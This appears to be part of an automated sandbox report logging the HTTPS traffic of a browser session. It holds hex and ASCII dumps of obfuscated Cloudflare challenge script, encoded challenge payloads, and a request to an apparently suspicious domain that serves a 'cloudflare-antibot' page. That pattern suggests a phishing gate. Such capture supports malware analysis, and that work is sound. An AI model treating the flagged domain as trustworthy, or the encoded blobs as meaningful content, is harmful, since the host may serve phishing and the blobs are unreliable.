                                                                                                        2024-10-04 13:11:24 UTC1369INData Raw: 2b 5d 29 7b 63 61 73 65 27 30 27 3a 57 3d 69 28 68 71 28 31 30 32 32 29 2c 68 71 28 34 38 35 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 45 5b 68 71 28 39 34 37 29 5d 28 57 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 58 2e 69 64 3d 68 71 28 31 35 33 33 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 58 5b 68 71 28 34 34 35 29 5d 3d 4c 28 68 71 28 34 36 35 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 58 5b 68 71 28 35 38 34 29 5d 3d 68 71 28 31 30 33 37 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 57 5b 68 71 28 39 34 37 29 5d 28 59 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 58 3d 6f 5b 68 71 28 31 32 34 30 29 5d 28 27 61 27 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27
                                                                                                        Data Ascii: +]){case'0':W=i(hq(1022),hq(485));continue;case'1':E[hq(947)](W);continue;case'2':X.id=hq(1533);continue;case'3':X[hq(445)]=L(hq(465));continue;case'4':X[hq(584)]=hq(1037);continue;case'5':W[hq(947)](Y);continue;case'6':X=o[hq(1240)]('a');continue;case'7'
                                                                                                        2024-10-04 13:11:24 UTC1369INData Raw: 48 26 26 28 48 3d 6a 2c 47 3d 64 5b 68 76 28 35 36 33 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4e 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4f 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 76 28 36 32 35 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 46 21 3d 4b 3b 4e 3d 64 5b 68 76 28 34 30 34 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 64 5b 68 76 28 31 36 30 30 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 68 76 28 31 32 38 36 29 5d 28 64 5b 68 76 28 37 34 30 29 5d 28 30 2c 4e 29 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 4f 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 45 3d 73 5b 33 5d 3d 4f 2c 44
                                                                                                        Data Ascii: H&&(H=j,G=d[hv(563)](o,I++)),J|=(0<N?1:0)*F,F<<=1);O=e(J);break;case 1:for(J=0,K=Math[hv(625)](2,16),F=1;F!=K;N=d[hv(404)](G,H),H>>=1,H==0&&(H=j,G=d[hv(1600)](o,I++)),J|=d[hv(1286)](d[hv(740)](0,N)?1:0,F),F<<=1);O=e(J);break;case 2:return''}for(E=s[3]=O,D
                                                                                                        2024-10-04 13:11:24 UTC1369INData Raw: 64 67 65 74 49 64 27 3a 65 4d 5b 68 78 28 31 38 33 39 29 5d 5b 68 78 28 31 31 36 36 29 5d 2c 27 65 76 65 6e 74 27 3a 65 5b 68 78 28 31 37 35 38 29 5d 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 68 78 28 31 38 33 39 29 5d 5b 68 78 28 36 38 30 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 68 78 28 31 38 33 39 29 5d 5b 68 78 28 36 38 38 29 5d 2c 27 63 6f 64 65 27 3a 68 78 28 34 32 36 29 2c 27 72 63 56 27 3a 65 4d 5b 68 78 28 31 38 33 39 29 5d 5b 68 78 28 39 34 36 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 65 4d 5b 67 49 28 37 30 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 68 79 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 29 7b 6b 3d 28 68 79 3d 67 49 2c 6a 3d 7b 7d 2c 6a 5b 68 79 28 31 35 34 31 29 5d 3d 66
                                                                                                        Data Ascii: dgetId':eM[hx(1839)][hx(1166)],'event':e[hx(1758)],'cfChlOut':eM[hx(1839)][hx(680)],'cfChlOutS':eM[hx(1839)][hx(688)],'code':hx(426),'rcV':eM[hx(1839)][hx(946)]},'*'))},g)},eM[gI(706)]=function(g,h,i,hy,j,k,l,m,n,o,s,x,B,C,D,E){k=(hy=gI,j={},j[hy(1541)]=f


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        12192.168.2.1649729104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:24 UTC925OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/786006458:1728044719:U-h0t91PTgLDBIoHLkW1c4DQoh4-3OGX1NMhUHSThFI/8cd56adf1e4c7ce7/c6eaeb7329255dd HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 2919
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        CF-Challenge: c6eaeb7329255dd
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Origin: https://challenges.cloudflare.com
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/x2cq0/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:24 UTC2919OUTData Raw: 76 5f 38 63 64 35 36 61 64 66 31 65 34 63 37 63 65 37 3d 35 31 4e 55 48 55 63 55 31 55 36 55 53 61 6a 46 61 6a 51 55 61 37 42 4b 6b 57 61 50 6a 6b 6a 78 54 37 77 6c 24 6a 43 67 69 6a 24 24 61 6e 6a 34 6a 70 37 50 4b 44 24 64 38 6a 5a 55 67 4b 6a 6f 71 6d 44 6b 24 6a 66 6a 6e 24 42 54 6a 35 4c 4b 6c 39 6a 42 24 6a 39 38 6a 67 4b 6a 38 76 6a 6a 4b 39 6d 55 6b 4b 64 56 77 69 71 4a 76 35 4e 39 55 42 6e 6a 54 41 43 6f 76 7a 6a 38 2d 41 6c 48 45 62 54 63 5a 58 38 39 36 55 50 44 61 67 6a 50 4e 6a 6c 36 54 4e 39 48 70 58 71 63 77 6c 6a 61 51 25 32 62 46 36 6a 6a 6f 52 4e 6a 37 55 37 4e 4f 41 24 6a 67 6f 55 6a 62 6c 44 6a 76 41 51 4e 59 6a 64 38 6a 39 4d 6c 38 76 44 57 4d 36 41 57 6a 69 4b 6a 74 55 6a 54 69 6a 64 54 65 24 44 6a 4d 55 6a 7a 42 6a 64 43 46 34 45 43
                                                                                                        Data Ascii: v_8cd56adf1e4c7ce7=51NUHUcU1U6USajFajQUa7BKkWaPjkjxT7wl$jCgij$$anj4jp7PKD$d8jZUgKjoqmDk$jfjn$BTj5LKl9jB$j98jgKj8vjjK9mUkKdVwiqJv5N9UBnjTACovzj8-AlHEbTcZX896UPDagjPNjl6TN9HpXqcwljaQ%2bF6jjoRNj7U7NOA$jgoUjblDjvAQNYjd8j9Ml8vDWM6AWjiKjtUjTijdTe$DjMUjzBjdCF4EC
                                                                                                        2024-10-04 13:11:24 UTC717INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 04 Oct 2024 13:11:24 GMT
                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                        Content-Length: 152172
                                                                                                        Connection: close
                                                                                                        cf-chl-gen: gx16x0ty8eMXspdPrYRW4nsvD0PbQUpAOu4lcrQ3Oeg0ovMeUyfzFBKwyJa1FnrsZBAtkEUgrRSZgPEAHongKvEPhI3pilzDKq9QPqJVT45rWalHxC7AGjF7KIRxlJxPanQ7v4eHF63ydfAZhHYzC+7EuwMuT75F7clhQLc4XP8i8D4w+L+6xgSPedeYzg1Ir/mMnT/JZ90ZB4LeXZtucnZu2HSYIk1Y5JgsuqSlxk/IFKGwD5vA/ZApiTUmDVa++v/S/DeUlTeOw2HQaG+BdMtISDrru/xF8CTbRf/oPo6WiYSPIox3j/T5BuwMuG0sV+VVBrdYCTySUEdRWj0W+UN0GuG17Evif4xMgNOZELMw5SViA3yS+EH4kOGXM6Eo68sOrJOWHmGDGbOdFdgeZwHc/Z+5MeST4e3SwZty5WX9WAGj7kKWOmL+A8DUxUeR1mxvbpfIHmAyQd2WoqTG/D5J7SZ6qMgDOzrs6nsn1IRFCVc=$o/Y/23e9hW7AlLyD
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56ae91e1d0f6c-EWR
                                                                                                        2024-10-04 13:11:24 UTC652INData Raw: 67 31 39 61 69 56 31 4f 66 46 36 46 55 56 5a 32 63 57 6c 57 63 48 31 73 6e 34 42 37 67 34 42 2f 6f 36 4f 66 66 71 68 70 5a 57 79 6f 71 4b 31 38 70 59 36 72 73 4c 61 34 64 4a 53 5a 6d 5a 61 49 69 72 6a 42 75 5a 32 44 75 48 33 45 77 49 57 6d 6f 70 6d 47 6f 4c 61 74 6e 4e 47 6d 6a 73 61 76 30 74 50 50 70 64 6e 56 7a 4a 76 63 32 4e 32 72 34 38 33 4d 35 4e 6e 43 76 65 54 71 6f 73 6e 4b 78 73 79 74 76 62 37 73 30 2b 33 4f 38 2f 53 7a 39 64 48 34 74 2f 76 34 2b 66 72 2b 77 75 33 50 2b 65 4c 7a 42 51 76 6d 35 64 58 6c 78 75 6e 5a 36 65 37 30 34 74 4d 58 45 77 54 57 36 2f 58 56 39 4f 6a 5a 38 74 33 5a 46 52 2f 64 46 50 6b 44 42 53 6a 35 43 51 30 6a 4c 42 49 51 45 53 77 41 46 69 76 77 4c 2f 6f 58 4b 79 6b 76 50 42 6a 38 4f 77 51 43 4e 53 55 42 52 55 6c 44 44 45 34
                                                                                                        Data Ascii: g19aiV1OfF6FUVZ2cWlWcH1sn4B7g4B/o6OffqhpZWyoqK18pY6rsLa4dJSZmZaIirjBuZ2DuH3EwIWmopmGoLatnNGmjsav0tPPpdnVzJvc2N2r483M5NnCveTqosnKxsytvb7s0+3O8/Sz9dH4t/v4+fr+wu3P+eLzBQvm5dXlxunZ6e704tMXEwTW6/XV9OjZ8t3ZFR/dFPkDBSj5CQ0jLBIQESwAFivwL/oXKykvPBj8OwQCNSUBRUlDDE4
                                                                                                        2024-10-04 13:11:24 UTC1369INData Raw: 59 30 78 59 56 6e 41 2b 56 34 46 7a 51 49 52 45 56 47 42 66 67 58 68 69 64 49 70 36 5a 34 74 65 54 47 71 55 58 35 57 41 63 47 78 58 6b 48 6d 4e 69 33 70 6e 62 6c 74 33 57 6e 5a 68 62 6d 53 70 6e 61 47 6c 6e 58 2b 74 71 48 43 79 65 6e 36 50 74 59 6d 55 67 59 6d 59 6c 4a 61 58 6d 72 43 36 6b 49 43 57 78 4d 53 54 73 5a 4b 65 67 4a 57 58 6d 36 32 42 75 4b 6a 4a 6e 37 43 74 6f 59 32 55 79 4b 58 4c 75 4c 6e 58 33 4c 36 76 73 38 7a 42 76 35 32 6c 33 74 58 67 76 4d 33 70 36 75 62 46 35 4f 7a 71 37 2b 44 77 37 76 54 4f 39 50 4c 33 76 66 6a 32 2f 50 7a 38 2b 67 48 77 41 66 34 47 33 67 55 44 43 63 30 4a 42 77 34 4e 44 51 73 53 31 52 45 50 46 78 55 56 45 78 76 33 37 4f 30 4a 46 65 45 46 49 50 50 64 39 51 67 70 48 69 67 45 35 41 6e 37 37 79 34 48 4a 43 63 67 4a 51 59
                                                                                                        Data Ascii: Y0xYVnA+V4FzQIREVGBfgXhidIp6Z4teTGqUX5WAcGxXkHmNi3pnblt3WnZhbmSpnaGlnX+tqHCyen6PtYmUgYmYlJaXmrC6kICWxMSTsZKegJWXm62BuKjJn7CtoY2UyKXLuLnX3L6vs8zBv52l3tXgvM3p6ubF5Ozq7+Dw7vTO9PL3vfj2/Pz8+gHwAf4G3gUDCc0JBw4NDQsS1REPFxUVExv37O0JFeEFIPPd9QgpHigE5An77y4HJCcgJQY
                                                                                                        2024-10-04 13:11:24 UTC1369INData Raw: 46 31 63 59 6a 31 59 64 32 5a 48 59 57 47 42 59 59 79 49 54 45 39 78 62 49 46 6a 6a 46 4b 49 53 58 61 5a 6a 6c 46 56 6e 5a 4e 70 57 61 47 58 62 48 53 46 68 35 2b 48 71 4a 35 69 6c 59 57 50 6e 48 36 50 62 57 36 67 74 72 4f 49 75 49 47 58 64 4c 68 7a 73 70 44 41 6d 4c 31 38 77 4d 4f 6b 6d 4d 69 67 69 72 6a 4a 68 62 32 75 72 4d 4f 4b 79 39 57 79 72 36 32 32 32 74 6d 72 79 39 75 75 79 38 76 57 32 4f 50 52 31 4d 4c 49 35 38 54 5a 35 75 76 65 32 4b 2f 49 76 65 47 6c 7a 4d 43 31 73 4e 43 77 7a 73 33 52 75 39 33 75 79 4d 37 54 33 4f 48 54 34 73 4c 69 32 77 63 44 34 73 55 4a 42 77 34 4e 44 51 73 53 31 52 45 50 46 78 55 56 45 78 76 33 37 4f 30 4a 46 65 45 46 49 50 50 64 39 51 67 70 48 69 67 70 2f 43 6e 74 4d 52 77 68 41 53 41 76 4e 50 4d 61 41 69 63 58 4d 41 38 62
                                                                                                        Data Ascii: F1cYj1Yd2ZHYWGBYYyITE9xbIFjjFKISXaZjlFVnZNpWaGXbHSFh5+HqJ5ilYWPnH6PbW6gtrOIuIGXdLhzspDAmL18wMOkmMigirjJhb2urMOKy9Wyr6222tmry9uuy8vW2OPR1MLI58TZ5uve2K/IveGlzMC1sNCwzs3Ru93uyM7T3OHT4sLi2wcD4sUJBw4NDQsS1REPFxUVExv37O0JFeEFIPPd9QgpHigp/CntMRwhASAvNPMaAicXMA8b
                                                                                                        2024-10-04 13:11:24 UTC1369INData Raw: 46 32 58 57 6c 30 69 49 70 37 6a 58 68 73 68 46 75 4c 6c 58 4e 53 59 48 56 53 65 35 65 4c 6a 48 70 58 69 59 71 44 61 33 79 42 63 32 2b 41 59 49 64 35 67 36 36 6c 65 34 6d 4d 71 47 71 68 70 6f 39 2f 6a 33 43 57 65 4a 4e 30 6e 72 2b 5a 6e 4c 6d 4c 6d 38 4f 39 6e 38 6d 66 70 58 32 6f 74 37 2b 69 73 49 71 79 7a 6f 75 53 7a 4e 50 48 75 63 32 34 73 71 61 58 74 4a 75 58 30 74 61 66 75 37 66 43 77 75 57 69 77 38 50 67 33 4b 6e 47 36 64 7a 75 79 74 2f 42 38 63 4c 6e 74 76 7a 6e 2b 65 33 48 33 63 2f 67 42 51 44 59 34 39 72 78 38 2b 76 58 34 51 44 72 41 2b 59 44 7a 63 7a 73 34 66 66 6b 35 39 41 50 38 77 37 79 32 52 2f 73 2b 68 30 64 48 42 55 67 33 69 6e 6d 44 42 2f 31 44 65 41 50 44 50 73 64 4b 41 45 76 43 6a 41 56 44 77 6f 4d 50 52 45 38 45 44 6f 58 4c 67 38 68 45
                                                                                                        Data Ascii: F2XWl0iIp7jXhshFuLlXNSYHVSe5eLjHpXiYqDa3yBc2+AYId5g66le4mMqGqhpo9/j3CWeJN0nr+ZnLmLm8O9n8mfpX2ot7+isIqyzouSzNPHuc24sqaXtJuX0tafu7fCwuWiw8Pg3KnG6dzuyt/B8cLntvzn+e3H3c/gBQDY49rx8+vX4QDrA+YDzczs4ffk59AP8w7y2R/s+h0dHBUg3inmDB/1DeAPDPsdKAEvCjAVDwoMPRE8EDoXLg8hE
                                                                                                        2024-10-04 13:11:24 UTC1369INData Raw: 4c 64 30 5a 5a 61 56 70 65 5a 56 4b 46 54 6d 4f 4e 67 35 64 39 56 49 39 39 56 6e 75 51 67 61 47 55 59 61 4b 6d 6b 70 74 6b 5a 6d 53 41 6f 71 36 48 6d 6f 78 38 72 34 71 43 6f 71 4f 6f 69 4b 65 32 75 33 75 77 71 37 4f 42 72 37 37 41 6c 4a 66 43 6d 72 6d 71 77 34 6d 2f 6e 59 2b 75 6a 72 32 2f 7a 4a 4b 77 6b 62 66 50 75 71 32 2b 33 4e 37 4f 7a 63 76 4e 70 4c 2f 48 78 61 47 37 77 4e 54 6e 76 37 33 45 7a 65 43 71 79 71 7a 6b 73 38 33 55 2b 4c 58 51 31 77 44 35 7a 77 50 58 30 4e 37 35 77 4e 6e 66 2b 75 71 39 35 4e 6e 6a 34 65 50 51 37 63 33 38 34 38 6a 4e 34 2b 59 61 39 66 66 37 47 4f 72 34 45 78 34 5a 2f 42 67 56 35 77 44 30 2f 67 6b 43 48 65 62 74 2b 69 58 38 36 2b 38 6a 38 68 49 51 46 54 41 45 2b 44 77 79 4e 52 30 7a 47 41 38 2f 46 69 67 68 48 79 45 30 50 6b
                                                                                                        Data Ascii: Ld0ZZaVpeZVKFTmONg5d9VI99VnuQgaGUYaKmkptkZmSAoq6Hmox8r4qCoqOoiKe2u3uwq7OBr77AlJfCmrmqw4m/nY+ujr2/zJKwkbfPuq2+3N7OzcvNpL/HxaG7wNTnv73EzeCqyqzks83U+LXQ1wD5zwPX0N75wNnf+uq95Nnj4ePQ7c3848jN4+Ya9ff7GOr4Ex4Z/BgV5wD0/gkCHebt+iX86+8j8hIQFTAE+DwyNR0zGA8/FighHyE0Pk
                                                                                                        2024-10-04 13:11:24 UTC1369INData Raw: 68 47 35 70 61 31 57 4c 54 4a 71 62 63 48 78 63 6b 33 32 5a 63 33 43 67 63 5a 2b 44 61 48 78 64 71 5a 65 61 71 57 68 6f 68 6d 79 54 6b 4b 2b 43 64 6f 47 74 70 59 31 36 72 37 71 4c 6e 36 75 2f 70 59 43 34 78 73 57 64 6f 4b 75 55 70 4b 53 74 70 4b 43 4e 72 71 53 6d 7a 63 43 52 7a 35 58 56 72 37 48 63 76 5a 71 63 76 36 4c 50 77 4b 58 6c 70 2b 58 71 78 2b 44 66 37 75 54 4f 71 63 62 66 78 2b 2f 65 77 4f 6a 54 38 72 72 71 33 66 48 63 33 4d 2b 38 31 65 79 39 2b 41 6e 6c 31 73 50 58 78 38 50 36 36 73 72 39 34 2b 30 43 78 78 51 4d 41 76 59 4d 43 2f 51 55 2f 52 44 38 46 42 77 66 41 78 6e 7a 45 67 58 69 2b 78 6a 33 2f 67 38 50 2f 41 63 43 2f 66 30 55 43 42 4c 71 4d 76 67 4d 2b 67 6b 31 43 67 6f 4f 4b 78 76 38 4d 6b 5a 43 50 67 6f 57 4a 6b 59 6a 49 6b 55 61 4c 6b 70
                                                                                                        Data Ascii: hG5pa1WLTJqbcHxck32Zc3CgcZ+DaHxdqZeaqWhohmyTkK+CdoGtpY16r7qLn6u/pYC4xsWdoKuUpKStpKCNrqSmzcCRz5XVr7HcvZqcv6LPwKXlp+Xqx+Df7uTOqcbfx+/ewOjT8rrq3fHc3M+81ey9+Anl1sPXx8P66sr94+0CxxQMAvYMC/QU/RD8FBwfAxnzEgXi+xj3/g8P/AcC/f0UCBLqMvgM+gk1CgoOKxv8MkZCPgoWJkYjIkUaLkp
                                                                                                        2024-10-04 13:11:24 UTC1369INData Raw: 6d 79 63 5a 58 39 59 6e 4a 2b 53 64 4b 52 38 6e 57 43 6b 70 34 52 38 72 48 56 32 5a 36 32 4f 73 5a 79 6a 73 4b 6d 33 69 5a 6d 53 65 71 31 39 64 4c 6d 64 6f 6e 54 44 77 36 48 42 77 73 69 6d 76 61 69 6c 76 72 6a 51 72 4d 66 4a 79 4d 75 30 72 64 69 35 31 5a 72 50 76 4c 4c 55 34 4c 69 54 33 62 75 69 33 4c 6a 5a 76 4d 47 79 77 38 62 4d 75 64 2f 61 79 4f 72 75 76 38 62 58 35 4c 66 32 2b 73 2f 54 2f 73 62 79 32 76 57 38 31 74 33 34 39 4c 6e 6d 41 4e 63 42 42 4f 33 4d 45 50 45 4f 30 67 67 43 45 2b 62 6a 46 51 50 79 32 50 54 5a 2b 75 66 72 49 4f 33 37 33 78 6e 33 47 52 76 39 43 77 76 65 2f 42 41 6d 43 77 63 54 2f 41 66 2b 49 41 54 31 43 78 76 37 4d 69 37 34 44 44 30 5a 4c 44 42 46 47 7a 44 39 50 7a 34 6e 46 43 34 39 48 67 30 73 54 69 35 4c 46 54 4a 53 55 31 6c 4f
                                                                                                        Data Ascii: mycZX9YnJ+SdKR8nWCkp4R8rHV2Z62OsZyjsKm3iZmSeq19dLmdonTDw6HBwsimvailvrjQrMfJyMu0rdi51ZrPvLLU4LiT3bui3LjZvMGyw8bMud/ayOruv8bX5Lf2+s/T/sby2vW81t349LnmANcBBO3MEPEO0ggCE+bjFQPy2PTZ+ufrIO373xn3GRv9Cwve/BAmCwcT/Af+IAT1Cxv7Mi74DD0ZLDBFGzD9Pz4nFC49Hg0sTi5LFTJSU1lO
                                                                                                        2024-10-04 13:11:24 UTC1369INData Raw: 78 79 6c 70 52 30 6a 70 57 56 59 33 75 6f 65 48 71 72 66 36 43 6e 62 47 35 75 68 6e 39 30 6a 4b 61 51 69 62 47 61 75 33 39 79 69 33 75 56 65 72 4b 76 66 58 71 52 71 59 65 31 6a 4b 65 62 72 73 65 36 76 72 4b 4c 6b 4a 4b 33 77 38 37 4d 6a 71 2b 39 7a 5a 76 55 74 37 57 66 6e 62 66 51 78 61 4b 33 7a 4d 6a 4b 37 64 2b 37 77 74 4b 2b 76 38 33 54 7a 4f 48 6a 7a 72 4c 55 2f 74 34 41 32 64 7a 6a 34 64 76 67 35 72 6e 64 2b 73 72 59 32 41 66 6c 43 4f 76 36 79 38 6f 56 36 50 54 54 45 2f 6e 53 35 78 76 79 36 76 41 43 32 66 49 6c 44 53 48 76 39 67 45 63 34 65 67 42 42 77 76 6e 47 68 77 48 36 77 73 6f 45 41 45 51 46 51 77 4f 4c 66 63 4c 39 52 6b 4e 41 76 77 41 52 41 52 42 41 7a 59 63 4a 79 64 4b 4a 45 41 75 4c 30 45 55 4e 43 4d 6f 4d 55 4a 58 4e 78 52 47 53 42 73 53 54
                                                                                                        Data Ascii: xylpR0jpWVY3uoeHqrf6CnbG5uhn90jKaQibGau39yi3uVerKvfXqRqYe1jKebrse6vrKLkJK3w87Mjq+9zZvUt7WfnbfQxaK3zMjK7d+7wtK+v83TzOHjzrLU/t4A2dzj4dvg5rnd+srY2AflCOv6y8oV6PTTE/nS5xvy6vAC2fIlDSHv9gEc4egBBwvnGhwH6wsoEAEQFQwOLfcL9RkNAvwARARBAzYcJydKJEAuL0EUNCMoMUJXNxRGSBsST
                                                                                                        2024-10-04 13:11:24 UTC1369INData Raw: 43 59 71 4e 33 68 57 52 2f 66 34 65 4d 73 4c 53 4c 6b 49 2b 4d 68 5a 53 62 74 72 79 78 68 73 43 57 77 71 4a 36 6e 5a 39 38 6b 36 61 57 79 61 57 6d 77 63 61 4d 70 4e 4b 66 6e 62 4b 4d 71 70 61 35 79 38 69 5a 74 63 36 72 72 37 6a 54 6d 73 32 35 77 4e 6a 6d 77 65 65 68 70 2b 6e 59 75 73 44 52 34 2b 76 4c 79 4e 50 68 72 61 2f 6b 7a 50 76 70 37 4e 62 67 41 4e 7a 6a 2f 67 58 67 33 73 50 66 36 4d 58 45 35 75 6a 6d 34 65 58 50 38 51 50 63 34 75 2f 77 39 41 76 72 7a 65 6e 6d 46 4f 7a 32 36 74 76 31 33 39 73 58 47 2b 50 38 43 65 73 4d 2b 69 76 39 36 53 63 44 4a 79 51 43 46 51 2f 7a 45 44 6f 61 4d 76 7a 30 44 52 76 36 2f 42 63 65 4f 54 58 35 4a 30 41 59 51 55 52 44 4b 6c 45 79 54 68 4e 48 4e 53 74 4e 57 54 4a 4d 56 44 64 57 53 30 42 4c 59 56 59 5a 4c 54 41 7a 5a 6b
                                                                                                        Data Ascii: CYqN3hWR/f4eMsLSLkI+MhZSbtryxhsCWwqJ6nZ98k6aWyaWmwcaMpNKfnbKMqpa5y8iZtc6rr7jTms25wNjmweehp+nYusDR4+vLyNPhra/kzPvp7NbgANzj/gXg3sPf6MXE5ujm4eXP8QPc4u/w9AvrzenmFOz26tv139sXG+P8CesM+iv96ScDJyQCFQ/zEDoaMvz0DRv6/BceOTX5J0AYQURDKlEyThNHNStNWTJMVDdWS0BLYVYZLTAzZk


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        13192.168.2.1649728103.159.65.1464431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:24 UTC623OUTGET /favicon.ico HTTP/1.1
                                                                                                        Host: hollandco.athrikasih.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: image
                                                                                                        Referer: https://hollandco.athrikasih.com/cloudflare-antibot/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:25 UTC415INHTTP/1.1 404 Not Found
                                                                                                        Connection: close
                                                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                        pragma: no-cache
                                                                                                        content-type: text/html
                                                                                                        content-length: 796
                                                                                                        date: Fri, 04 Oct 2024 13:11:25 GMT
                                                                                                        server: LiteSpeed
                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                        2024-10-04 13:11:25 UTC796INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        14192.168.2.1649732104.78.188.1884431540C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:24 UTC390OUTGET /onboarding/smskillreader.txt HTTP/1.1
                                                                                                        Host: armmf.adobe.com
                                                                                                        Connection: keep-alive
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        2024-10-04 13:11:25 UTC247INHTTP/1.1 200 OK
                                                                                                        Server: Apache
                                                                                                        Last-Modified: Mon, 01 May 2023 15:02:33 GMT
                                                                                                        ETag: "78-5faa31cce96da"
                                                                                                        Accept-Ranges: bytes
                                                                                                        Content-Length: 120
                                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                                        Date: Fri, 04 Oct 2024 13:11:24 GMT
                                                                                                        Connection: close
